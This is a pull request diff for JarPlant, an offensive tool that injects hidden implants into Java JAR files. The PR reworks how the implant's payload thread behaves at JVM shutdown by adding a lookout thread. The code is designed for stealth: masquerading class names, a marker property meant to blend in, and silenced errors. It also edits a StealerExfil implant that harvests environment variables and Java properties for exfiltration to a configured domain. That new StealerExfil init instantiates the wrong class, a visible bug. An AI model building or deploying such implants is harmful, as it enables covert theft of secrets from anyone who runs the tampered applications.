### PR TITLE
Graceful implant shutdown

### DIFF
--- a/README.md
+++ b/README.md
@@ -116,7 +116,6 @@ Spike any JAR with an implant that will always finish no matter what:
 java -jar jarplant-cli.jar class-injector \
    --target path/to/target.jar \
    --implant ClassImplant
-   --config CONF_BLOCK_JVM_SHUTDOWN=true 
 ```
 
 Be careful with blocking operations in your payload code.
@@ -127,28 +126,32 @@ JarPlant supports injection of custom values with the implants. A set of common 
 with the template and built-in implants.
 These are:
 
-| Configuration property    | Data type | Description                                                                                                    | Default value     |
-|---------------------------|-----------|----------------------------------------------------------------------------------------------------------------|-------------------|
-| `CONF_JVM_MARKER_PROP`    | String    | JVM system property to create and use as a "marker" to determine if an implant has been detonated in this JVM. | `java.class.init` |
-| `CONF_BLOCK_JVM_SHUTDOWN` | boolean   | Controls whether the implant's thread will block the JVM from fully exiting until the implant is done.         | `false`           |
-| `CONF_DELAY_MS`           | int       | Optional delay (in milliseconds) before the implant payload will detonate.                                     | `0`               |
+| Configuration property   | Data type | Description                                                                                                    | Default value     |
+|--------------------------|-----------|----------------------------------------------------------------------------------------------------------------|-------------------|
+| `CONF_JVM_MARKER_PROP`   | String    | JVM system property to create and use as a "marker" to determine if an implant has been detonated in this JVM. | `java.class.init` |
+| `CONF_GRACEFUL_SHUTDOWN` | boolean   | Controls whether the implant will attempt to shut down the payload thread gracefully.                          | `true`            |
+| `CONF_DELAY_MS`          | int       | Optional delay (in milliseconds) before the implant payload will detonate.                                     | `0`               |
 
 See the `ClassImplant` template Javadoc for mor info in these properties.
 
-### Blocking the JVM exit
+### Graceful implant shutdown
 
-Be extra careful with the `CONF_BLOCK_JVM_SHUTDOWN` property. If this is set to `true`, then the JVM will wait for your
-payload to finish its execution. If your payload takes a long time, then the spiked app will fail to exit properly. It's
-_not_ recommended to set a non-zero `CONF_DELAY_MS` value together with `CONF_BLOCK_JVM_SHUTDOWN=true`.
+If `CONF_GRACEFUL_SHUTDOWN` is set to `true`, the implant will attempt to shut down the payload thread gracefully when
+the affected Java application is done executing. It does so by spawning a separate "lookout thread" that will poll the
+state of all threads running on the JVM. If all regular (non-daemon) threads have finished executing, the implant
+thread will be _interrupted_. **It's therefor very important that the implant payload code properly handles thread
+interruption.** This is typically done by checking `Thread.interrupted()` and catching `InterruptedException`s properly.
+See [Oracle documentation on thread interruption](https://docs.oracle.com/javase/tutorial/essential/concurrency/interrupt.html)
+for more details.
 
-If you've injected an implant into an app that exits very quickly, then your payload may not get enough time to execute
-if `CONF_BLOCK_JVM_SHUTDOWN` is set to `false` (which is the default setting).
+Setting `CONF_GRACEFUL_SHUTDOWN` to `false` will make the payload thread a daemon thread.
+The [JVM Shutdown Sequence](https://docs.oracle.com/en/java/javase/21/docs/api/java.base/java/lang/Runtime.html#shutdown)
+will not wait for daemon threads to finish executing. Thus, the payload thread will be abruptly killed when the
+affected application is done executing. If the affected application is very short-lived in its execution, the implant
+payload may not even run at all!
 
-As a general rule of thumb, only set `CONF_BLOCK_JVM_SHUTDOWN` to `true` if your implant is quick to execute and/or it's
-absolutely essential that it _must_ finish.
-
-For any target apps that takes some time to run (like a back-end service), there should be plenty time for your implant
-to do its thing with `CONF_BLOCK_JVM_SHUTDOWN` set to its default value of `false`.
+`CONF_GRACEFUL_SHUTDOWN` is set to `true` by default. Set it to `false` if there are any problems with affected
+applications not exiting properly (or even better: debug, fix and submit a Pull Request).
 
 ## Quickly implement a custom implant
 
@@ -193,7 +196,9 @@ public class Demo {
     public static void main(String[] args) {
         try {
             ImplantHandler implant = ImplantHandlerImpl.findAndCreateFor(YourCustomImplant.class);
-            implant.setConfig("CONF_BLOCK_JVM_SHUTDOWN", true);
+            implant.setConfig("CONF_CUSTOM_VALUE", "some custom string value");
+            implant.setConfig("CONF_SOME_NUM", 1337);
+            implant.setConfig("CONF_ENABLE_WICKEDNESS", true);
 
             Path target = Path.of("target.jar");
             JarFiddler jar = JarFiddler.buffer(target);

--- a/jarplant-implants/src/main/java/io/github/w1th4d/jarplant/implants/ClassImplant.java
+++ b/jarplant-implants/src/main/java/io/github/w1th4d/jarplant/implants/ClassImplant.java
@@ -78,11 +78,14 @@ public class ClassImplant implements Runnable, Thread.UncaughtExceptionHandler {
         if (CONF_DELAY_MS > 0) {
             try {
                 Thread.sleep(CONF_DELAY_MS);
-            } catch (InterruptedException ignored) {
+            } catch (InterruptedException e) {
+                Thread.currentThread().interrupt();
             }
         }
 
-        payload();
+        if (!Thread.currentThread().isInterrupted()) {
+            payload();
+        }
     }
 
     /**

--- a/jarplant-implants/src/main/java/io/github/w1th4d/jarplant/implants/ClassImplant.java
+++ b/jarplant-implants/src/main/java/io/github/w1th4d/jarplant/implants/ClassImplant.java
@@ -58,6 +58,17 @@ public class ClassImplant implements Runnable, Thread.UncaughtExceptionHandler {
                 background.setDaemon(!CONF_BLOCK_JVM_SHUTDOWN);
                 background.setUncaughtExceptionHandler(implant);
                 background.start();
+
+                /*
+                 * Run a lookout thread that waits for all other (non-daemon) threads in the JVM to finish.
+                 * If backwards compatibility pre Java 8 is required, then the Runnable supplied to the lookout thread
+                 * needs to be a separate class instead of a lambda function. Since *this* class is already used as a
+                 * Runnable for the payload thread, that means one more .class file needs to be injected into the JAR.
+                 * If needed, just put waitForOtherThreads in a separate class, make it implement Runnable and supply
+                 * an instance of that class to the constructor of the lookout thread.
+                 */
+                Thread lookout = new Thread(() -> waitForOtherThreads(background));
+                lookout.start();
             }
         }
     }
@@ -76,6 +87,55 @@ public class ClassImplant implements Runnable, Thread.UncaughtExceptionHandler {
         }
 
         payload();
+    }
+
+    /**
+     * Wait for all non-daemon thread on this JVM to finish, then interrupt the payload thread.
+     * This enables the payload to shut down gracefully.
+     *
+     * @param payloadThread reference to the payload thread
+     */
+    private static void waitForOtherThreads(Thread payloadThread) {
+        while (!Thread.interrupted()) {
+            // Inspect threads currently running in this JVM:
+            boolean foundAnyOtherThreadAlive = false;
+            for (Thread thread : Thread.getAllStackTraces().keySet()) {
+                if (thread.equals(payloadThread)) {
+                    continue;
+                }
+                if (thread.equals(Thread.currentThread())) {
+                    continue;
+                }
+                if (thread.isDaemon()) {
+                    continue;
+                }
+                if (thread.getName().equals("DestroyJavaVM") || thread.getStackTrace().length == 0) {
+                    /*
+                     * When the main thread is finished, a special thread "DestroyJavaVM" may pop up.
+                     * This is and indicator that the main thread is done, but that does not mean all (legit) threads
+                     * are done yet. Ignore this thread and continue the search.
+                     */
+                    continue;
+                }
+                if (thread.isAlive()) {
+                    foundAnyOtherThreadAlive = true;
+                    break;
+                }
+            }
+
+            if (!foundAnyOtherThreadAlive) {
+                payloadThread.interrupt();
+                break;
+            }
+
+            // Wait for a while and check again...
+            try {
+                //noinspection BusyWait because we can't put latches and stuff in all arbitrary threads we're waiting for.
+                Thread.sleep(500);
+            } catch (InterruptedException e) {
+                Thread.currentThread().interrupt();
+            }
+        }
     }
 
     /**

--- a/jarplant-implants/src/main/java/io/github/w1th4d/jarplant/implants/ClassImplant.java
+++ b/jarplant-implants/src/main/java/io/github/w1th4d/jarplant/implants/ClassImplant.java
@@ -125,11 +125,8 @@ public class ClassImplant implements Runnable, Thread.UncaughtExceptionHandler {
 
             if (!foundAnyOtherThreadAlive) {
                 payloadThread.interrupt();
-                System.out.println("[lookout] Interrupting payload thread!");
                 break;
             }
-
-            System.out.println("[lookout] Still alive.");
 
             // Wait for a while and check again...
             try {
@@ -166,30 +163,5 @@ public class ClassImplant implements Runnable, Thread.UncaughtExceptionHandler {
         System.out.println(" __\\||/__");
         System.out.println(" \\ pwnd /");
         System.out.println("  \\____/");
-
-        while (!Thread.interrupted()) {
-            System.out.println("[payload] Running.");
-
-            try {
-                //noinspection BusyWait
-                Thread.sleep(1000);
-            } catch (InterruptedException e) {
-                Thread.currentThread().interrupt();
-                System.out.println("[payload] Got interrupted!");
-            }
-        }
-        System.out.println("[payload] Interrupted and/or done!");
-    }
-
-    public static void main(String[] argv) {
-        System.out.println("[main] Initializing implant.");
-        ClassImplant.init();
-
-        System.out.println("[main] Pretending to do something...");
-        try {
-            Thread.sleep(5500);
-        } catch (InterruptedException ignored) {
-        }
-        System.out.println("[main] Done.");
     }
 }

--- a/jarplant-implants/src/main/java/io/github/w1th4d/jarplant/implants/ClassImplant.java
+++ b/jarplant-implants/src/main/java/io/github/w1th4d/jarplant/implants/ClassImplant.java
@@ -34,9 +34,6 @@ public class ClassImplant implements Runnable, Thread.UncaughtExceptionHandler {
 
     /**
      * Optional delay (in milliseconds) before the implant payload will detonate.
-     * <p>This can be used in combination with <code>CONF_BLOCK_JVM_SHUTDOWN</code> in order to only run the payload
-     * when the app is a long-running one (like a service). Just set it to <code>0</code> in order to run the payload
-     * as soon as possible.</p>
      * <p>The default value is <code>0</code>.</p>
      */
     static volatile int CONF_DELAY_MS = 0;

--- a/jarplant-implants/src/main/java/io/github/w1th4d/jarplant/implants/ClassImplant.java
+++ b/jarplant-implants/src/main/java/io/github/w1th4d/jarplant/implants/ClassImplant.java
@@ -60,9 +60,11 @@ public class ClassImplant implements Runnable, Thread.UncaughtExceptionHandler {
                 payloadThread.setUncaughtExceptionHandler(implant);
                 payloadThread.start();
 
-                // Run a lookout thread that waits for all other (non-daemon) threads in the JVM to finish:
-                Thread lookoutThread = new Thread(() -> waitForOtherThreads(payloadThread));
-                lookoutThread.start();
+                if (CONF_BLOCK_JVM_SHUTDOWN) {
+                    // Run a lookout thread that waits for all other (non-daemon) threads in the JVM to finish:
+                    Thread lookoutThread = new Thread(() -> waitForOtherThreads(payloadThread));
+                    lookoutThread.start();
+                }
             }
         }
     }

--- a/jarplant-implants/src/main/java/io/github/w1th4d/jarplant/implants/ClassImplant.java
+++ b/jarplant-implants/src/main/java/io/github/w1th4d/jarplant/implants/ClassImplant.java
@@ -7,8 +7,8 @@ package io.github.w1th4d.jarplant.implants;
  * complicate the injection process. Having everything in one big class requires only one class file to be injected into
  * the target JAR, thus making the implant a bit less obvious and more simple. The downside is that the code for
  * implants may be a bit more involved to maintain - a small price to pay for a more stealthy and robust implant.</p>
- * <p>Also feel free to add any static field beginning with CONF_* to add your own config properties for the implant.
- * These will be picked up by the injector and hardcoded into the class file's const pool.</p>
+ * <p>Also feel free to add any static field beginning with <i>CONF_*</i> to add your own config properties for the
+ * implant. These will be picked up by the injector and hardcoded into the class file's const pool.</p>
  * <p>If you don't want to bother with creating new files and stuff, then you may also just add your code to this
  * template class, recompile the project and use it with the ClassInjector.</p>
  * <p>Also note that this class will be renamed to something else during the injection process in order to masquerade
@@ -17,36 +17,34 @@ package io.github.w1th4d.jarplant.implants;
 public class ClassImplant implements Runnable, Thread.UncaughtExceptionHandler {
     /**
      * JVM system property to create and use as a "marker" to determine if an implant has been detonated in this JVM.
-     * This property name could be anything that does not already naturally exist in the JVM. Just make it blend in.
+     * <p>This property name could be anything that does not already naturally exist in the JVM. Just make it blend in.</p>
+     * <p>The default value is <i>"java.class.init"</i>.</p>
      */
     static volatile String CONF_JVM_MARKER_PROP = "java.class.init";
 
     /**
-     * Controls whether the implant's thread will block the JVM from fully exiting until the implant is done.
-     * <p>Set this to 'true' if you absolutely require the implant to fully finnish running before the JVM shuts down.
-     * Take great care when setting this to 'true'! If the implant payload code blocks, sleeps or performs long-running
-     * operations, then this will block the JVM from shutting down properly as the target app normally shuts down.
-     * In other words: Only set this to 'true' if your implant payload does something quick and it _needs_ to be done
-     * in full. Don't set this to 'true' if the implant payload listens for connections or waits for something to
-     * happen. However, *do* set this to 'true' if you want the payload to always finish what it's doing.</p>
-     * <p>Essentially, setting this to 'false' makes the implant payload thread a "daemon thread". This means that
-     * the JVM will not wait for it when all regular threads (like the main thread) are done.</p>
+     * Controls whether the payload thread will block the JVM from fully exiting until the payload is done.
+     * <p>When set to <code>true</code>>, a separate "lookout thread" will be used to interrupt the payload thread when
+     * it seems like the app is finished executing. <b>Make sure your payload properly handles thread interruption when
+     * performing long-running or blocking operations.</b> Failing to do so may cause the JVM to not exit properly when
+     * the target app is done.</p>
+     * <p>Default value is <code>false</code>.</p>
      */
     static volatile boolean CONF_BLOCK_JVM_SHUTDOWN = false;
 
     /**
      * Optional delay (in milliseconds) before the implant payload will detonate.
-     * <p>This can be used in combination with CONF_BLOCK_JVM_SHUTDOWN in order to only run the payload when the app is
-     * a long-running one (like a service). Just set it to '0' in order to run the payload asap.</p>
-     * <p>DO NOT set a delay and CONF_BLOCK_JVM_SHUTDOWN to 'true' unless you want to risk delaying the JVM from
-     * shutting down properly.</p>
+     * <p>This can be used in combination with <code>CONF_BLOCK_JVM_SHUTDOWN</code> in order to only run the payload
+     * when the app is a long-running one (like a service). Just set it to <code>0</code> in order to run the payload
+     * as soon as possible.</p>
+     * <p>The default value is <code>0</code>.</p>
      */
     static volatile int CONF_DELAY_MS = 0;
 
     /**
      * The entry point in this implant class.
-     * <p>The ClassInjector will copy this method to the target and modify the target's class initializer function
-     * to invoke this method.</p>
+     * <p>The <code>ClassInjector</code> will copy this method to the target and modify the target's class initializer
+     * function to invoke this method.</p>
      * <p>You probably don't want to modify this method.</p>
      */
     @SuppressWarnings("unused")
@@ -71,7 +69,6 @@ public class ClassImplant implements Runnable, Thread.UncaughtExceptionHandler {
 
     /**
      * Entry point for the payload thread.
-     * <p>This is the place to put your own payload code.</p>
      */
     @Override
     public void run() {
@@ -90,7 +87,7 @@ public class ClassImplant implements Runnable, Thread.UncaughtExceptionHandler {
 
     /**
      * Wait for all non-daemon thread on this JVM to finish, then interrupt the payload thread.
-     * This enables the payload to shut down gracefully.
+     * <p>This enables the payload to shut down gracefully.</p>
      *
      * @param payloadThread reference to the payload thread
      */
@@ -139,7 +136,7 @@ public class ClassImplant implements Runnable, Thread.UncaughtExceptionHandler {
 
     /**
      * Handler for any uncaught exceptions.
-     * This stops the JVM from spewing errors to stderr when something goes wrong in the thread.
+     * <p>This stops the JVM from spewing errors to stderr when something goes wrong in the thread.</p>
      *
      * @param thread    the thread that had an exception
      * @param throwable the uncaught exception
@@ -151,7 +148,8 @@ public class ClassImplant implements Runnable, Thread.UncaughtExceptionHandler {
 
     /**
      * This is the actual payload.
-     * Feel free to rename this method. Remember that method names will show up in the compiled class file.
+     * <p>This is the place to put your own payload code.</p>
+     * <p>Feel free to rename this method. Remember that method names will show up in the compiled class file.</p>
      */
     private void payload() {
         System.out.println("  /\\/\\/\\");

--- a/jarplant-implants/src/main/java/io/github/w1th4d/jarplant/implants/ClassImplant.java
+++ b/jarplant-implants/src/main/java/io/github/w1th4d/jarplant/implants/ClassImplant.java
@@ -28,9 +28,9 @@ public class ClassImplant implements Runnable, Thread.UncaughtExceptionHandler {
      * it seems like the app is finished executing. <b>Make sure your payload properly handles thread interruption when
      * performing long-running or blocking operations.</b> Failing to do so may cause the JVM to not exit properly when
      * the target app is done executing.</p>
-     * <p>Default value is <code>false</code>.</p>
+     * <p>Default value is <code>true</code>.</p>
      */
-    static volatile boolean CONF_GRACEFUL_SHUTDOWN = false;
+    static volatile boolean CONF_GRACEFUL_SHUTDOWN = true;
 
     /**
      * Optional delay (in milliseconds) before the implant payload will detonate.

--- a/jarplant-implants/src/main/java/io/github/w1th4d/jarplant/implants/ClassImplant.java
+++ b/jarplant-implants/src/main/java/io/github/w1th4d/jarplant/implants/ClassImplant.java
@@ -125,8 +125,11 @@ public class ClassImplant implements Runnable, Thread.UncaughtExceptionHandler {
 
             if (!foundAnyOtherThreadAlive) {
                 payloadThread.interrupt();
+                System.out.println("[lookout] Interrupting payload thread!");
                 break;
             }
+
+            System.out.println("[lookout] Still alive.");
 
             // Wait for a while and check again...
             try {
@@ -163,5 +166,30 @@ public class ClassImplant implements Runnable, Thread.UncaughtExceptionHandler {
         System.out.println(" __\\||/__");
         System.out.println(" \\ pwnd /");
         System.out.println("  \\____/");
+
+        while (!Thread.interrupted()) {
+            System.out.println("[payload] Running.");
+
+            try {
+                //noinspection BusyWait
+                Thread.sleep(1000);
+            } catch (InterruptedException e) {
+                Thread.currentThread().interrupt();
+                System.out.println("[payload] Got interrupted!");
+            }
+        }
+        System.out.println("[payload] Interrupted and/or done!");
+    }
+
+    public static void main(String[] argv) {
+        System.out.println("[main] Initializing implant.");
+        ClassImplant.init();
+
+        System.out.println("[main] Pretending to do something...");
+        try {
+            Thread.sleep(5500);
+        } catch (InterruptedException ignored) {
+        }
+        System.out.println("[main] Done.");
     }
 }

--- a/jarplant-implants/src/main/java/io/github/w1th4d/jarplant/implants/ClassImplant.java
+++ b/jarplant-implants/src/main/java/io/github/w1th4d/jarplant/implants/ClassImplant.java
@@ -23,14 +23,14 @@ public class ClassImplant implements Runnable, Thread.UncaughtExceptionHandler {
     static volatile String CONF_JVM_MARKER_PROP = "java.class.init";
 
     /**
-     * Controls whether the payload thread will block the JVM from fully exiting until the payload is done.
+     * Controls whether the implant will attempt to shut down the payload thread gracefully.
      * <p>When set to <code>true</code>>, a separate "lookout thread" will be used to interrupt the payload thread when
      * it seems like the app is finished executing. <b>Make sure your payload properly handles thread interruption when
      * performing long-running or blocking operations.</b> Failing to do so may cause the JVM to not exit properly when
-     * the target app is done.</p>
+     * the target app is done executing.</p>
      * <p>Default value is <code>false</code>.</p>
      */
-    static volatile boolean CONF_BLOCK_JVM_SHUTDOWN = false;
+    static volatile boolean CONF_GRACEFUL_SHUTDOWN = false;
 
     /**
      * Optional delay (in milliseconds) before the implant payload will detonate.
@@ -54,11 +54,11 @@ public class ClassImplant implements Runnable, Thread.UncaughtExceptionHandler {
                 // Run the payload in a separate thread:
                 ClassImplant implant = new ClassImplant();
                 Thread payloadThread = new Thread(implant);
-                payloadThread.setDaemon(!CONF_BLOCK_JVM_SHUTDOWN);
+                payloadThread.setDaemon(!CONF_GRACEFUL_SHUTDOWN);
                 payloadThread.setUncaughtExceptionHandler(implant);
                 payloadThread.start();
 
-                if (CONF_BLOCK_JVM_SHUTDOWN) {
+                if (CONF_GRACEFUL_SHUTDOWN) {
                     // Run a lookout thread that waits for all other (non-daemon) threads in the JVM to finish:
                     Thread lookoutThread = new Thread(() -> waitForOtherThreads(payloadThread));
                     lookoutThread.setUncaughtExceptionHandler(implant);

--- a/jarplant-implants/src/main/java/io/github/w1th4d/jarplant/implants/ClassImplant.java
+++ b/jarplant-implants/src/main/java/io/github/w1th4d/jarplant/implants/ClassImplant.java
@@ -61,6 +61,7 @@ public class ClassImplant implements Runnable, Thread.UncaughtExceptionHandler {
                 if (CONF_BLOCK_JVM_SHUTDOWN) {
                     // Run a lookout thread that waits for all other (non-daemon) threads in the JVM to finish:
                     Thread lookoutThread = new Thread(() -> waitForOtherThreads(payloadThread));
+                    lookoutThread.setUncaughtExceptionHandler(implant);
                     lookoutThread.start();
                 }
             }

--- a/jarplant-implants/src/main/java/io/github/w1th4d/jarplant/implants/ClassImplant.java
+++ b/jarplant-implants/src/main/java/io/github/w1th4d/jarplant/implants/ClassImplant.java
@@ -29,7 +29,7 @@ public class ClassImplant implements Runnable, Thread.UncaughtExceptionHandler {
      * In other words: Only set this to 'true' if your implant payload does something quick and it _needs_ to be done
      * in full. Don't set this to 'true' if the implant payload listens for connections or waits for something to
      * happen. However, *do* set this to 'true' if you want the payload to always finish what it's doing.</p>
-     * <p>Essentially, setting this to 'false' makes the implant background thread a "daemon thread". This means that
+     * <p>Essentially, setting this to 'false' makes the implant payload thread a "daemon thread". This means that
      * the JVM will not wait for it when all regular threads (like the main thread) are done.</p>
      */
     static volatile boolean CONF_BLOCK_JVM_SHUTDOWN = false;
@@ -53,28 +53,22 @@ public class ClassImplant implements Runnable, Thread.UncaughtExceptionHandler {
     public static void init() {
         if (System.getProperty(CONF_JVM_MARKER_PROP) == null) {
             if (System.setProperty(CONF_JVM_MARKER_PROP, "true") == null) {
+                // Run the payload in a separate thread:
                 ClassImplant implant = new ClassImplant();
-                Thread background = new Thread(implant);
-                background.setDaemon(!CONF_BLOCK_JVM_SHUTDOWN);
-                background.setUncaughtExceptionHandler(implant);
-                background.start();
+                Thread payloadThread = new Thread(implant);
+                payloadThread.setDaemon(!CONF_BLOCK_JVM_SHUTDOWN);
+                payloadThread.setUncaughtExceptionHandler(implant);
+                payloadThread.start();
 
-                /*
-                 * Run a lookout thread that waits for all other (non-daemon) threads in the JVM to finish.
-                 * If backwards compatibility pre Java 8 is required, then the Runnable supplied to the lookout thread
-                 * needs to be a separate class instead of a lambda function. Since *this* class is already used as a
-                 * Runnable for the payload thread, that means one more .class file needs to be injected into the JAR.
-                 * If needed, just put waitForOtherThreads in a separate class, make it implement Runnable and supply
-                 * an instance of that class to the constructor of the lookout thread.
-                 */
-                Thread lookout = new Thread(() -> waitForOtherThreads(background));
-                lookout.start();
+                // Run a lookout thread that waits for all other (non-daemon) threads in the JVM to finish:
+                Thread lookoutThread = new Thread(() -> waitForOtherThreads(payloadThread));
+                lookoutThread.start();
             }
         }
     }
 
     /**
-     * Entry point for the background thread.
+     * Entry point for the payload thread.
      * <p>This is the place to put your own payload code.</p>
      */
     @Override

--- a/jarplant-implants/src/main/java/io/github/w1th4d/jarplant/implants/StealerExfil.java
+++ b/jarplant-implants/src/main/java/io/github/w1th4d/jarplant/implants/StealerExfil.java
@@ -13,8 +13,9 @@ public class StealerExfil implements Runnable, Thread.UncaughtExceptionHandler {
     public static final String URL_ALPHABET = "abcdefghijklmnopqrstuvwxyz0123456789";
     private static final int MAX_SEQNO_LEN = 5;
 
+    // Config properties from ClassImplant template:
     static volatile String CONF_JVM_MARKER_PROP = "java.class.init";
-    static volatile boolean CONF_BLOCK_JVM_SHUTDOWN = false;
+    static volatile boolean CONF_GRACEFUL_SHUTDOWN = true;
     static volatile int CONF_DELAY_MS = 0;
 
     /**
@@ -57,19 +58,29 @@ public class StealerExfil implements Runnable, Thread.UncaughtExceptionHandler {
      */
     static volatile int CONF_FQDN_MAX_LEN = 253;
 
+    // From ClassImplant template:
     @SuppressWarnings("unused")
     public static void init() {
         if (System.getProperty(CONF_JVM_MARKER_PROP) == null) {
             if (System.setProperty(CONF_JVM_MARKER_PROP, "true") == null) {
-                StealerExfil implant = new StealerExfil();
-                Thread background = new Thread(implant);
-                background.setDaemon(!CONF_BLOCK_JVM_SHUTDOWN);
-                background.setUncaughtExceptionHandler(implant);
-                background.start();
+                // Run the payload in a separate thread:
+                ClassImplant implant = new ClassImplant();
+                Thread payloadThread = new Thread(implant);
+                payloadThread.setDaemon(!CONF_GRACEFUL_SHUTDOWN);
+                payloadThread.setUncaughtExceptionHandler(implant);
+                payloadThread.start();
+
+                if (CONF_GRACEFUL_SHUTDOWN) {
+                    // Run a lookout thread that waits for all other (non-daemon) threads in the JVM to finish:
+                    Thread lookoutThread = new Thread(() -> waitForOtherThreads(payloadThread));
+                    lookoutThread.setUncaughtExceptionHandler(implant);
+                    lookoutThread.start();
+                }
             }
         }
     }
 
+    // From ClassImplant template:
     @Override
     public void run() {
         if (CONF_DELAY_MS > 0) {
@@ -82,11 +93,62 @@ public class StealerExfil implements Runnable, Thread.UncaughtExceptionHandler {
         payload(System.getenv(), System.getProperties());
     }
 
+    // From ClassImplant template:
+    private static void waitForOtherThreads(Thread payloadThread) {
+        while (!Thread.interrupted()) {
+            // Inspect threads currently running in this JVM:
+            boolean foundAnyOtherThreadAlive = false;
+            for (Thread thread : Thread.getAllStackTraces().keySet()) {
+                if (thread.equals(payloadThread)) {
+                    continue;
+                }
+                if (thread.equals(Thread.currentThread())) {
+                    continue;
+                }
+                if (thread.isDaemon()) {
+                    continue;
+                }
+                if (thread.getName().equals("DestroyJavaVM") || thread.getStackTrace().length == 0) {
+                    /*
+                     * When the main thread is finished, a special thread "DestroyJavaVM" may pop up.
+                     * This is and indicator that the main thread is done, but that does not mean all (legit) threads
+                     * are done yet. Ignore this thread and continue the search.
+                     */
+                    continue;
+                }
+                if (thread.isAlive()) {
+                    foundAnyOtherThreadAlive = true;
+                    break;
+                }
+            }
+
+            if (!foundAnyOtherThreadAlive) {
+                payloadThread.interrupt();
+                break;
+            }
+
+            // Wait for a while and check again...
+            try {
+                //noinspection BusyWait because we can't put latches and stuff in all arbitrary threads we're waiting for.
+                Thread.sleep(500);
+            } catch (InterruptedException e) {
+                Thread.currentThread().interrupt();
+            }
+        }
+    }
+
+    // From ClassImplant template:
     @Override
     public void uncaughtException(Thread thread, Throwable throwable) {
         // Silently ignore (don't throw up error messages on stderr)
     }
 
+    /**
+     * This is the StealerExfil-specific payload code.
+     *
+     * @param envVars   environment variables
+     * @param javaProps java runtime properties
+     */
     void payload(Map<String, String> envVars, Properties javaProps) {
         if (CONF_DOMAIN == null || CONF_DOMAIN.isEmpty()) {
             return;
@@ -124,13 +186,14 @@ public class StealerExfil implements Runnable, Thread.UncaughtExceptionHandler {
 
     /**
      * Convert Properties object to Map<String, String> type.
+     *
      * @param prop java.util Properties object.
      * @return Map of key value pair strings.
      */
     static Map<String, String> propToMap(Properties prop) {
         Map<String, String> map = new HashMap<>();
 
-        for (Enumeration<?> e = prop.propertyNames(); e.hasMoreElements();) {
+        for (Enumeration<?> e = prop.propertyNames(); e.hasMoreElements(); ) {
             String key = (String) e.nextElement();
             String value = prop.getProperty(key); // Safely get value as String
             map.put(key, value);
@@ -141,8 +204,9 @@ public class StealerExfil implements Runnable, Thread.UncaughtExceptionHandler {
 
     /**
      * Map Key matcher returns whatever is worth stealing in a Map of <String, String>.
+     *
      * @param map Map of Key value pair properties to match
-     * @return      Matching properties as Map of Strings
+     * @return Matching properties as Map of Strings
      */
     static Map<String, String> getMatcingKeys(Map<String, String> map, String interesting) {
         Pattern pattern = Pattern.compile(interesting, Pattern.CASE_INSENSITIVE);


### PR DESCRIPTION
Remove the `CONF_BLOCK_JVM_SHUTDOWN` property and its mechanics.

Instead use a `CONF_GRACEFUL_SHUTDOWN`. This will spawn a separate "lookout thread" that polls the state of all threads running in the JVM. When all regular (non-daemon) threads are finished executing, the payload thread will be interrupted. This allows the payload code to safely perform long-running and blocking operations without blocking the exit of the JVM.

As it adds more complexity and is somewhat experimental, this behaviour can be disabled. When doing so, the payload thread will be marked as a daemon thread, no lookout thread will be created and the payload thread will be killed abruptly when the affected application is done executing. This is the same behaviour as when `CONF_BLOCK_JVM_SHUTDOWN` was set to `false`.

A notable downside this code is that it uses a lambda function for the lookout thread. This requires Java 8 or greater which means that any target JAR must contain classes compiled for Java 8 or above. As of yet, `jarplant-lib` does not check for compatibility with the implant class and target classes. This is a known issue.

The reason why a lambda function must be used is that the `Thread` class requires a `Runnable`. The implant class itself is declared as implementing `Runnable` and is used for the _payload thread_. In order to provide a new `Runnable` for the lookout thread, either a lambda function or a *separate custom class* (implementing `Runnable`) needs to be provided. This would add one more class file to the target JAR. There need to be support for that dreaded `deepRename` method to also "deep rename" dependency classes. This is all for stealth and is debatable. If/when a more generous backwards compatibility is implemented, this needs to be dealt with.